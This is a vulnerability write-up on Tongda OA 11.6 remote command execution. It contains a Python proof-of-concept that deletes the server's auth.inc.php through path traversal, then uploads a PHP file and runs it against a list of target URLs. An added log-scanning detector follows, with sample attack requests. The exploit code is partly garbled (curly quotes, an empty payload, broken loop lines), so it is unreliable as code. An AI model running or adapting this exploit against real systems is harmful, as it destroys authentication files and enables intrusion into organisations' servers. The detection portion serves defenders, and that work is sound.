# Tongda OA 11.6 Remote Command Execution Vulnerability

I. Vulnerability Overview
------------

This vulnerability causes serious damage to the web application and disrupts the normal operation of the site; use with caution!

II. Affected Versions
------------

Tongda OA <= 11.6

III. Reproduction
------------

### poc

#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
# by Tommy, modified from the original author's version, 2020-8-19, Tongda OA 0-day exploit
import sys
version = sys.version_info
if version < (3, 0):
print('The current version is not supported, you need to use python3')
sys.exit()
def exploit(target):
try:
target=target
payload='‘#harmless check
print(target,”[*]删除auth.inc.php…”)

url=target+”/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php”#request that deletes auth.inc.php
requests.get(url=url,verify=False,timeout=10)
print(target,”[*]正在检查文件是否已删除…”)
url=target+”/inc/auth.inc.php”
page=requests.get(url=url,verify=False,timeout=10).text
#print(page)
if ‘No input file specified.’ not in page:
print(target,”[-]无法删除auth.inc.php文件”)
return 0
print(target,”[+]删除auth.inc.php成功”)
print(target,”[*]开始上传payload…”)
url=target+”/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./”
files = {‘FILE1’: (‘deconf.php’, payload)}
requests.post(url=url,files=files,verify=False,timeout=10)
url=target+”/_deconf.php”
page=requests.get(url=url,verify=False,timeout=10).text
if ‘No input file specified.’ not in page:
print(“[+]************************文件已存在,上传成功************************”)
if ‘8a8127bc83b94ad01414a7a3ea4b8′ in page:#only confirm the vulnerability if the md5 function was executed, to reduce false positives
print(target,”************************代码执行成功,存在漏洞************************”)
print(target,”[+]URL:”,url)
else:
print(target,”[-]文件上传失败”)
except Exception as e:
print(target,e)
urls=’url.txt’
print(“[*]警告:利用此漏洞,会删除auth.inc.php,这可能会损坏OA系统”)
input(“按Enter继续”)
for url in open(urls,’r’,encoding=’utf-8′).read().split(‘\n’):
url=url.split()
url=url.split()
exploit(url[0])
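
The three requests the PoC above sends (the `print.php` call with a path in `guid`, the probe of `/inc/auth.inc.php`, and the `upload.php` call with a path in `repkid`) leave a recognisable trail in web server access logs. The following is an added example, not part of the original post, that flags them. It assumes a combined-format access log and that legitimate `guid`/`repkid` values are never paths; the log lines are constructed and the tag names are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (combined log format assumed), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [19/Aug/2020:10:01:02 +0800] "GET /module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php HTTP/1.1" 200 0 "-" "python-requests/2.24.0"
198.51.100.7 - - [19/Aug/2020:10:01:03 +0800] "GET /inc/auth.inc.php HTTP/1.1" 404 25 "-" "python-requests/2.24.0"
198.51.100.7 - - [19/Aug/2020:10:01:04 +0800] "POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./ HTTP/1.1" 200 12 "-" "python-requests/2.24.0"
203.0.113.20 - - [19/Aug/2020:10:05:00 +0800] "GET /module/appbuilder/assets/print.php?guid=5f3c9a1e HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})')

def has_path_chars(value):
    # Assumption: a legitimate guid/repkid is a plain identifier, never a path.
    return any(tok in value for tok in ("..", "/", "\\"))

def classify(target):
    """Map a request target to one of the PoC's indicators, or None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if path.endswith("/module/appbuilder/assets/print.php") and any(map(has_path_chars, query.get("guid", []))):
        return "DELETE_VIA_PRINT"
    if path.endswith("/general/data_center/utils/upload.php") and any(map(has_path_chars, query.get("repkid", []))):
        return "UPLOAD_VIA_REPKID"
    if path.endswith("/inc/auth.inc.php"):
        return "AUTH_INC_PROBE"
    return None

def scan(log_text):
    """Return (client, timestamp, tag, status) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        tag = classify(m.group(4)) if m else None
        if tag:
            findings.append((m.group(1), m.group(2), tag, int(m.group(5))))
    return findings

def chained_sources(findings):
    """Clients that sent both the deletion request and the upload request."""
    seen = {}
    for client, _ts, tag, _status in findings:
        seen.setdefault(client, set()).add(tag)
    return sorted(c for c, tags in seen.items() if {"DELETE_VIA_PRINT", "UPLOAD_VIA_REPKID"} <= tags)

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print("chained:", chained_sources(scan(SAMPLE_LOG)))
```

A client that appears in `chained_sources` warrants checking whether `webroot/inc/auth.inc.php` still exists and whether unexpected `.php` files have appeared in the web root.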
